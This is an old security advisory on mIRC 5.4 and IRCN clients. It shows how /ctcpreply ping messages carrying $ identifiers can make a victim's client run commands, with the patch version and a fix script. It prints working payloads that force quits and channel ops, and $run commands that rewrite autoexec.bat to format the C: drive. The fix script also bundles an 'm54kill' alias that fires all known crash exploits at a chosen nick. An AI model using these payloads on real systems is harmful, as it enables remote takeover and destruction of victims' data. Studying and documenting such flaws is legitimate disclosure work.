COMMAND

    irc

SYSTEMS AFFECTED

    Systems running mIRC and IRCN

PROBLEM

    Number of vulnerabilities has been   found in IRC clients.   Using
    the  command  /ctcpreply,  any  user  can  make  someone using the
    backdoored versions do whatever they want.  For example:

        /ctcpreply (nickname) ping $quit(i,am,owned)
        /ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)

    Result:

        *** ^DaWg^ (DaWg@cc576078-a.essx1.md.home.com) Quit (owned by you)

    Latest will will force Dianora to give ops to hax0r in  #us-opers.
    For you unix users telnet to the irc server on port 6667 and type:

        user bleh bleh bleh bleh bleh
        nick asdfksdjflk (this will be your nick.. Get creative)

    then type:

        notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)

    and KABOOM!  There are a lot of nice little things you can do with
    this bug. They can be forced to run arbitrary programs:

        /ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
        /ctcpreturn (nick) $run(c:\autoexec.bat)

    Any mIRC script  that makes use  of the event  "ON CTCPREPLY PING"
    which does a  $calc or any  other remote/event that  uses $calc is
    exploitable.

SOLUTION

    The author of  mIRC has released  v5.41 to address  these security
    holes and various other bugs in  the 5.4 release. It can be  found
    at

        http://www.mirc.co.uk/

    Most people are  only patching themselves  against the $calc  bug,
    but  are  still  wondering  why  their  mIRC keeps crashing..  Its
    because  they  have  not  patched  themselves  against the 2 other
    remote mIRC  exploits.   Below is  the patch  for ALL known remote
    mIRC exploits.  to install it type "/load -rs m54-fix-sploits.mrc"
    (Thanks to myn@efnet).

    ;mIRC 5.4 QuickFIX and Exploits
    ;myn@efnet - 07/22/98


    ;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98)

    ;DCC exploit fix
    ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }
    ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } }

    ;ctcpreply ping $asctime crash and $identifier Exploit fix
    ;replace all instances of the event "on ctcpreply" with the one below

    on 1:CTCPREPLY:PING* {
      if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt }
      if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick   | halt }
      echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s)
      halt
    }

    ;And as an added bonus for all you DALnet kiddies
    ;This sends all known mIRC 5.4 exploits at once
    alias m54kill {
      if ($1) {
        .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie)
        %ip = $rand(600000000,4294967294)
        .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1)
        .ctcpreply $1 ping $!asctime(2147483647)
        echo -a * Sent mIRC kills to $1
        halt
      }
      echo -a * Parms [/m54kill nick/#channel]
    }